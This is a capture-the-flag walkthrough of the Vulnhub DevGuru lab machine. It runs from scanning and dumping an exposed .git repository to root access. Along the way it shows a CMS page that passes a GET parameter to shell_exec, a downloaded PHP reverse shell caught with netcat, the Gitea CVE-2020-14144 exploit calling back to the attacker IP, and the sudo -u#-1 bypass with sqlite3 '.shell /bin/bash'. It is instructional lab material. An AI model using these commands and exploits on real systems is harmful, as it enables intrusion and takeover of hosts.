Devguru
Exploitation Guide for Devguru | Vulnhub
Last updated
Was this helpful?
Exploitation Guide for Devguru | Vulnhub
Last updated
Was this helpful?
In this walkthrough, we will get the initial shell by exploiting .git to get the credential for database . Then we will login to web application with cms which has code execution vulnerability. To escalate our privilege to another user we will get credential for database in backup file. We will use that credential to change the password of user and login to web application which has authenticated RCE. Finally we will gain the root privileges by exploiting sudo vulnerability and sudo misconfiguration.
## Nmap Full Tcp scan
nmap -p- -vv -Pn -oN nmapFullTCP.txt 192.168.79.130
Nmap scan report for 192.168.79.130
Host is up, received user-set (0.0015s latency).
Scanned at 2021-08-31 21:44:27 EDT for 2s
Not shown: 65532 closed ports
Reason: 65532 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8585/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Aug 31 21:44:29 2021 -- 1 IP address (1 host up) scanned in 2.37 seconds
## Nmap Version enumeration with default script
nmap -sVCS -O -oN nmapVersion.txt -p22,80,8585 192.168.79.130
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_ 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git:
| 192.168.79.130:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open unknown
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=6a1b7184bb6ff2dc; Path=/; HttpOnly
| Set-Cookie: _csrf=P0Mgfs31k9b4oM_mEs0kULhN9Lg6MTYzMDQ2MDcyNjQxNzUyMzAzMA; Path=/; Expires=Thu, 02 Sep 2021 01:45:26 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Wed, 01 Sep 2021 01:45:26 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_ <meta name="description" content="Gitea (Git with a c┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ dirsearch -u $ip /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
[22:16:36] Starting:
[22:16:38] 301 - 315B - /.git -> http://192.168.79.130/.git/
[22:16:38] 200 - 13B - /.git/COMMIT_EDITMSG
[22:16:38] 200 - 73B - /.git/description
[22:16:38] 200 - 276B - /.git/config
[22:16:38] 200 - 23B - /.git/HEAD
[22:16:38] 200 - 240B - /.git/info/exclude
[22:16:38] 200 - 308KB - /.git/index
[22:16:38] 301 - 331B - /.git/logs/refs/heads -> http://192.168.79.130/.git/logs/refs/heads/
[22:16:38] 200 - 158B - /.git/logs/HEAD
[22:16:38] 200 - 158B - /.git/logs/refs/heads/master
[22:16:38] 301 - 325B - /.git/logs/refs -> http://192.168.79.130/.git/logs/refs/
[22:16:38] 301 - 340B - /.git/logs/refs/remotes/origin -> http://192.168.79.130/.git/logs/refs/remotes/origin/
[22:16:38] 301 - 333B - /.git/logs/refs/remotes -> http://192.168.79.130/.git/logs/refs/remotes/
[22:16:38] 200 - 41B - /.git/refs/heads/master
[22:16:38] 301 - 328B - /.git/refs/remotes -> http://192.168.79.130/.git/refs/remotes/
[22:16:38] 301 - 335B - /.git/refs/remotes/origin -> http://192.168.79.130/.git/refs/remotes/origin/
[22:16:38] 200 - 41B - /.git/refs/remotes/origin/master
[22:16:38] 301 - 325B - /.git/refs/tags -> http://192.168.79.130/.git/refs/tags/
[22:16:38] 301 - 326B - /.git/refs/heads -> http://192.168.79.130/.git/refs/heads/
[22:16:38] 200 - 142B - /.git/logs/refs/remotes/origin/master
[22:16:39] 200 - 413B - /.gitignore
[22:16:39] 200 - 2KB - /.htaccess
[22:16:45] 200 - 12KB - /0
[22:16:47] 200 - 18KB - /About
[22:16:50] 200 - 1KB - /README.md
[22:16:56] 200 - 18KB - /about
[22:17:04] 200 - 4KB - /adminer.php
[22:17:11] 302 - 414B - /backend/ -> http://192.168.79.130/backend/backend/auth
[22:17:17] 301 - 317B - /config -> http://192.168.79.130/config/
[22:17:35] 200 - 12KB - /index.php
[22:17:44] 301 - 318B - /modules -> http://192.168.79.130/modules/
[22:17:54] 301 - 318B - /plugins -> http://192.168.79.130/plugins/
[22:18:02] 200 - 10KB - /services
[22:18:02] 200 - 10KB - /services/
[22:18:06] 301 - 318B - /storage -> http://192.168.79.130/storage/
[22:18:10] 301 - 317B - /themes -> http://192.168.79.130/themes/
.gitis found. We may be able to download all the content.
Found database login portal:
Login page for cms
Version
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ dirsearch -u $ip:8585 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50 -o ~/Desktop/devguru/scans/dirsearch8585.txt
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
Output File: /home/kali/Desktop/devguru/scans/dirsearch8585.txt
Error Log: /home/kali/.dirsearch/logs/errors-21-08-31_22-31-30.log
Target: http://192.168.79.130:8585/
[22:31:30] Starting:
[22:31:36] 302 - 34B - /admin -> /user/login
[22:31:36] 302 - 34B - /admin/?/login -> /user/login
[22:31:36] 302 - 34B - /admin/ -> /user/login
[22:31:38] 200 - 575B - /api/swagger
[22:31:40] 302 - 27B - /css -> /css
[22:31:40] 200 - 160B - /debug
[22:31:40] 200 - 160B - /debug/
[22:31:41] 302 - 37B - /explore -> /explore/repos
[22:31:41] 200 - 10KB - /explore/repos
[22:31:42] 302 - 29B - /fonts -> /fonts
[22:31:42] 302 - 27B - /img -> /img
[22:31:43] 302 - 34B - /issues -> /user/login
[22:31:43] 302 - 26B - /js -> /js
[22:31:44] 200 - 670B - /manifest.json
[22:31:50] 200 - 9KB - /user/login/
Task CompletedSince we have access to .git we can download all the files in our local PC and look for juicy stuff.
First dump the file using gitdumper
┌──(imtodess㉿deathnote)-[~/tools/GitTools/Dumper]
└─$ ./gitdumper.sh http://devguru.local/.git/ website/
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
########### Then use extractor to get the missing file:
┌──(imtodess㉿deathnote)-[~/tools/GitTools/Extractor]
└─$ ./extractor.sh ~/Desktop/devguru/loot/website ~/Desktop/devguru/loot/ExtractedWeb
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
Lets look at the contents we got from it.
┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ ls
app.php cache.php database.php mail.php session.php
auth.php cms.php environment.php queue.php view.php
broadcasting.php cookie.php filesystems.php services.php Look at database.php
'mysql' => [
'driver' => 'mysql',
'engine' => 'InnoDB',
'host' => 'localhost',
'port' => 3306,
'database' => 'octoberdb',
'username' => 'october',
'password' => 'SQ66EBYx4GT3byXH',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'varcharmax' => 191,
], Login to database through adminer.php
Found User:
Seems like we can edit the data. Change the password. Generate new Bcrypt hash and replace the previous hash with new one.
Then login to cms portal.
Under CMS tab, seems like we can execute code.
Add new page. And add the code as shown.
# code
function onStart(){
$this->page["myVar"] = shell_exec($_GET['cmd']);
}
# markup
{{ this.page.myVar }}Reference : https://octobercms.com/forum/post/running-php-code-on-pages
Now we have code injection
We will upload our malicious php reverse shell and execute it to get our initial shell.
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Start http.server on directory with exploit.
┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ ls
shell.php
┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Download the shell in target machine:
Check if it is downloaded successfully.
Start Netcat listener:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
Execute the shell script.
We now have initial access to target machine:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ nc -nvlp 8585 1 ⨯
listening on [any] 8585 ...
connect to [192.168.79.129] from (UNKNOWN) [192.168.79.130] 46030
Linux devguru.local 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
23:36:27 up 2:12, 0 users, load average: 0.04, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
There is a backup file. From there we will get another set of credential for gitea database.
www-data@devguru:/var$ cd backups/
www-data@devguru:/var/backups$ ls
app.ini.bak apt.extended_states.0 apt.extended_states.1.gz
www-data@devguru:/var/backups$ cat app.ini.bak
. . .
; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
. . .Login to the database through adminer.php and do the same thing we did earlier. Change the password of user .
Note: We need to change
hash_algotobcrypt.
Now login to gitea at port 8585.
Look for known exploits:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ searchsploit gitea 1.12
------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------ ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authentic | multiple/webapps/49571.py
------------------------------------------------ ---------------------------------
Shellcodes: No Results There is one Authenticated (RCE) . Since we already have the credential lets use this exploit. Copy the exploit to your working directory.
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ cd ../exploit
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ searchsploit -m multiple/webapps/49571.py
Exploit: Gitea 1.12.5 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49571
Path: /usr/share/exploitdb/exploits/multiple/webapps/49571.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/Desktop/devguru/exploit/49571.py Start netcat listener.
┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ nc -nvlp 8585
listening on [any] 8585 ... Execute the exploit:
┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ python3 49571.py -v -t http://192.168.79.130:8585 -u frank -p imtodess -I 192.168.79.129 -P 8585
_____ _ _______
/ ____(_)__ __| CVE-2020-14144
| | __ _ | | ___ __ _
| | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution
| |__| | | | | __/ (_| |
\_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5
[+] Starting exploit ...
[>] login('frank', ...)
[>] Deleting repository : vuln
[>] Creating repository : vuln
[>] repo_set_githook_post_receive('vuln')
[>] logout()
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
Initialized empty Git repository in /tmp/tmp.XLsXCQ6oLY/.git/
[master (root-commit) abec032] Initial commit
1 file changed, 1 insertion(+)
create mode 100644 README.md
Enumerating objects: 3, done.
Counting objects: 100% (3/3), done.
Writing objects: 100% (3/3), 249 bytes | 249.00 KiB/s, done.
[>] Deleting repository : vuln
[+] Exploit completed !
We now have access to machine as user frank
┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
connect to [192.168.79.129] from (UNKNOWN) [192.168.79.130] 44816
bash: cannot set terminal process group (658): Inappropriate ioctl for device
bash: no job control in this shell
frank@devguru:~/gitea-repositories/frank/vuln.git$ cd
frank@devguru:~$ ls
ls
gitea-repositoriesCheck for sudo privilege
frank@devguru:~$ sudo -l
sudo -l
Matching Defaults entries for frank on devguru:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User frank may run the following commands on devguru:
(ALL, !root) NOPASSWD: /usr/bin/sqlite3Check sudo version
frank@devguru:~$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2 This version of sudo is vulnerable to security bypass.
Reference: https://www.exploit-db.com/exploits/47502 Any user can execute
/bin/bashwith sudo -u#-1 /bin/bash
We will use this security bypass vulnerability along with our sudo privilege to escalate our privilege to root.
frank@devguru:~$ sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
root@devguru:~# cd /root
root@devguru:/root# ls
msg.txt root.txt
root@devguru:/root# cat root.txt
96440606fb88aa7497cde5a8e68daf8f
root@devguru:/root# cat msg.txt
Congrats on rooting DevGuru!
Contact me via Twitter @zayotic to give feedback!
root@devguru:/root# cat /home/frank/user.txt
22854d0aec6ba776f9d35bf7b0e00217 
